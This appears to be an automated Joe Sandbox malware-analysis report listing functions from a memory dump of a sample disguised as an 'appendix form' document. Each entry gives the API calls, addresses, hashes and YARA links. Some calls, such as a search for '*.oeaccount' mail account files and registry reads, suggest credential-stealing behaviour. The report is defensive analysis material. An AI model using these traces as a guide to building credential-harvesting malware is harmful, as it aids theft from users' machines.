                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099061454-0
                                                                                                              • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                              • Instruction ID: 9d5022db8ba3b04779ac2e9664088e7462d9cf1087a2f4409b49694314ac1291
                                                                                                              • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                              • Instruction Fuzzy Hash: FB21F7114496816FFB218BB84C017B67BD8DB13364F19469BE184CB243D76CD85693FA
                                                                                                              Function 0044B42B Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetProcAddress.KERNEL32(00000000,0044B41C), ref: 0044B42C
                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                                                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                                                                                              • GetModuleHandleA.KERNEL32(?,0044B405), ref: 0044B460
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0044B488
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 2152742572-0
                                                                                                              • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                              • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                                                                                              • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                              • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                                                                                              Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,0040CF6F,771B0A60,?,00000000), ref: 00410D1C
                                                                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                              Strings
                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                              • API String ID: 889583718-2036018995
                                                                                                              • Opcode ID: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                                              • Opcode Fuzzy Hash: 20c56a313fda590c221b6e52e0c08165982b45312d52e9976c101796b2ccff0c
                                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                                              Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                                              • String ID:
                                                                                                              • API String ID: 3473537107-0
                                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                              Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3143880245-0
                                                                                                              • Opcode ID: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                                              • Opcode Fuzzy Hash: 886dc5ecc355c3466c5937889f3c24e8c73449ac36ec953dbb08d3698ea6811a
                                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                                              Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??3@
                                                                                                              • String ID:
                                                                                                              • API String ID: 613200358-0
                                                                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                              Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408D5C
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408D7A
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408D98
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00008000,00408DC4,00409CE2,?,?,?,?,?,00000000,771B0A60), ref: 00408DA8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@
                                                                                                              • String ID:
                                                                                                              • API String ID: 1033339047-0
                                                                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                                              Function 00406F30 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • malloc.MSVCRT ref: 00406F4C
                                                                                                              • memcpy.MSVCRT(00000000,00000000,00000000,00000000,771B0A60,00407A43,00000001,?,00000000,771B0A60,00407DBD,00000000,?,?), ref: 00406F64
                                                                                                              • free.MSVCRT ref: 00406F6D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: freemallocmemcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 3056473165-0
                                                                                                              • Opcode ID: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                                              • Opcode Fuzzy Hash: f6360f64df0fef16feaa284e534344f6101794aca07d62af19e0e66fd0e0db42
                                                                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                                              Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                                                                              • String ID: Arial
                                                                                                              • API String ID: 3853255127-493054409
                                                                                                              • Opcode ID: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                                              • Opcode Fuzzy Hash: e1a7fbc8e0c3f992e8010e024108b0d146431013d356363f6a3ac0433cd380c2
                                                                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                                              Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: strlen$_strcmpimemset
                                                                                                              • String ID: /stext
                                                                                                              • API String ID: 520177685-3817206916
                                                                                                              • Opcode ID: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                                              • Opcode Fuzzy Hash: 04fdc3cc00142dadabd4a88d380940465e4f92171bf306a3922122064ace388a
                                                                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                                              Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                                              • String ID:
                                                                                                              • API String ID: 145871493-0
                                                                                                              • Opcode ID: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                                              • Opcode Fuzzy Hash: 368c38512e7cad3fe60d4057cd97a9280d54471de6c65fc2eb8301d482549758
                                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                                              Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4165544737-0
                                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                                              Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(?,?), ref: 0040479A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                                              Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNELBASE(?,40000000,00000001,00000000,00000002,00000000,00000000,0040B01C,00000000,00000000,00000000,0044C52F,0044C52F,?,0040CF35,0044C52F), ref: 00406D2C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFile
                                                                                                              • String ID:
                                                                                                              • API String ID: 823142352-0
                                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                                              Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: FreeLibrary
                                                                                                              • String ID:
                                                                                                              • API String ID: 3664257935-0
                                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                                              Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • EnumResourceNamesA.KERNEL32(?,?,00410C68,00000000), ref: 00410D02
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumNamesResource
                                                                                                              • String ID:
                                                                                                              • API String ID: 3334572018-0
                                                                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                                              Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseFind
                                                                                                              • String ID:
                                                                                                              • API String ID: 1863332320-0
                                                                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                                              Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Open
                                                                                                              • String ID:
                                                                                                              • API String ID: 71445658-0
                                                                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                                              Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000009.00000002.1967791996.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000009.00000002.1967791996.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000009.00000002.1967791996.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_9_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AttributesFile
                                                                                                              • String ID:
